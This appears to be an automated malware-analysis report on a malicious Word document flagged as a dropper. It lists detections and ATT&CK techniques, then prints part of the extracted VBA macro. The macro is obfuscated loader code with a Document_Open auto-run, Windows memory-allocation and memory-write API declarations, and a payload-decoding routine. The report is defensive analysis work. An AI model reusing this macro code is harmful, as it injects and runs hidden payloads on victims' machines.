Verdict: MALICIOUS
Risk Score: 122

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The ClamAV detection 'Doc.Dropper.Agent-6574852-0' strongly suggests its role as a dropper. The VBA code, while obfuscated, includes API declarations for memory manipulation and timer creation, indicating a sophisticated payload execution mechanism. The primary function of the Document_Open macro appears to be the initiation of this payload.
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6574852-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6574852-0
- VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro [high] (OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11831 bytes | 0e80e342f5aee52d2a2ec28b7ccc96b93fa3cbe2edbc17451253d60036ae9eea |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    impacted = smoggy
    kneeler
    leonem = 30 + 22
    Pmt 0, leonem, 4386, 59801, 6
End Sub

Attribute VB_Name = "axiology"
#If (76 - 21 + 345 + 62 - 50 + 288) > ((115 - 16 + 221) - (124 - 55 + 471) * 1) And Not ((70 - 118 + 76) - (1 - 25 + 52)) * 2 < (Win64) Then
Public Declare Function feces _
    Lib "Kernel32" Alias _
    "CreateTimerQueueTimer" (affricate As Any, ByVal idicate As Any, ByVal injection As Any, ByVal dsillusionner As Any, ByVal dolore As Any, ByVal tricentenary As Any, ByVal phosphorous As Any) As Long
Public Declare Function animating _
    Lib "ntdll " Alias _
    "ZwWriteVirtualMemory" (ByVal shrewishly As Any, ByVal conversely As Any, ByVal circles As Any, ByVal voltaic As Any, ByVal bone As Any) As Long
Public Declare Function calculatingly _
    Lib "ntdll " Alias _
    "NtAllocateVirtualMemory" (dysplasia As Long, conventional As Long, ByVal savara As Long, biggestByVal As Long, booze As Long, ByVal cacation As Long) As Long
#End If
Function haber(corkage) As String
    Dim chinaware As Long
    Dim distribute(63) As Long
    Dim furrow() As Byte
    aileron = amusement * 3
    Dim invigorate(6962) As Byte
    Dim all As Long
    Dim blackwater As Long
    Dim footbridge As Integer
    Dim amplification(63) As Long
    Dim appulse As String
    Dim aleurone As Long
    Dim curium(63) As Long
    balefully = 127 - 124 + 258045
    unsleeping = 27 - 21 + 249
    have = 52 - 114 + 126
    important = 116 - 27 + 16711591
    miserabile = 6 - 86 + 4112
    crimson = 92 - 66 + 4070
    Dim antigua As Byte
    fing = 62 - 120 + 65594
    millgirl = 124 - 89 + 65245
    Dim clinodactyly As Integer
    Dim lutefisk As Long
    netherlander = 69 - 85 + 272
    peppy = 39 - 32 + 56
    aleyrodes = 26 - 117 + 262235
    adapa = 60 - 51 + 16515063
    Dim engraulidae As String
    dearest = 95 - 63 + 7811
    Dim prissy() As Byte
    prissy = VBA.StrConv(corkage, 120 + 8)
    disfranchisement = 8 + 42
    Pmt 0, disfranchisement, 27945, 56453, 4
    bier = 7843
    bedpost = vbKeyShift - 12
    For imbalance = 0 To bier
        If imbalance Mod 2 = 0 Then
            prissy(imbalance) = prissy(imbalance) - bedpost
        Else
            prissy(imbalance) = prissy(imbalance) - (bedpost - 1)
        End If
    Next imbalance
    jacamar = 34 + 8
    Pmt 0, jacamar, 36208, 10396, 4
    footbridge = 0
    braille = ominous
    For blackwater = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
        amplification(blackwater) = ashtoreth(blackwater, have, 68)
        distribute(blackwater) = ashtoreth(blackwater, crimson, 68)
        curium(blackwater) = ashtoreth(blackwater, aleyrodes, 68)
    Next blackwater
    aevi = 25 + 57
    Pmt 0, aevi, 11162, 29589, 7
    furrow = prissy
    foreday = 12 - 112 + 104
    candlemaker = 3 + 46
    Pmt 0, candlemaker, 31387, 40243, 6
    fortemente = 14 - 29 + 18
    deliverance = artilleryman
    aileron = Math.Round(64)
    silentio = fortemente + 1
    ecclesiology = 128 - 5 - 121
    For aleurone = 0 To bier
        consular = furrow(aleurone)
        bellows = furrow(aleurone + 2)
        dd = distribute(braille(furrow(aleurone + 1)))
        millisecond = amplification(braille(bellows)) + braille(furrow(aleurone + fortemente))
        all = curium(braille(consular)) + dd + millisecond
        blackwater = ashtoreth(all, important, 60)
        invigorate(chinaware) = ashtoreth(blackwater, fing, 50)
        blackwater = ashtoreth(all, millgirl, 60)
        invigorate(chinaware + 1) = ashtoreth(blackwater, netherlander, 50)
        invigorate(chinaware + ecclesiology) = ashtoreth(all, unsleeping, 60)
        chinaware = chinaware + ecclesiology + 1
        aleurone = aleurone + 3
    Next
    haber = invigorate
End Function
Function ominous()
    Dim carnality(255) As Byte
    artful = 96 - 85 + 54
    For i = artful To (98 - 109 + 102)
        carnality(artful) = artful - (2 - 38 + 101)
        artful = artful + 1
        If (20 - 10 + 81) < artful Then
            fecerat = almightiness + 44 - 40 + 61
            Exit For
        End If
        doings = silicosis + 48 - 29 + 46
    Next
    artful = (39 - 95 + 104)
    For i ... (truncated)
```